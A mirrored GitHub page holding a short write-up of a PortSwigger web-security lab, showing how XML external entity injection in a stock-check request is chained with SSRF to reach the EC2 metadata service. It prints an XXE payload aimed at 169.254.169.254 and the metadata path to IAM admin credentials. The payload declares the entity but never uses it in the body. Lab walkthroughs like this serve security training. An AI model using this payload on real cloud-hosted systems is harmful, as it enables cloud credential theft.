Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2025-02-16 20:18:24 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/Portswigger/XXE/Lab2.md
ARZ 04b4585956
Create Lab2.md
2021-12-02 12:59:37 +05:00

1.1 KiB
Raw Blame History

Portswigger XXE-Lab 2

Exploiting XXE to perform SSRF attacks

In this lab we are told to perfrom XXE and chaing it with SSRF to access ec2 instance's meta-data to retrieve iam admin credentials , the checkstock is vulnerable to XXE as it's parsing data in XML format

So here let's use burpsuite to capture the request

To perform XXE attack , we need to declare an external entity

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY arz SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>			   	
     <productId>
		14
	</productId>
	<storeId>
		1
	</storeId>
</stockCheck>

This is expecting latest so let's add that

Now it expects meta-data so in this way we can find the endpoints

And enventually we'll find iam credentials

http://169.254.169.254/latest/meta-data/iam/security-credentials/admin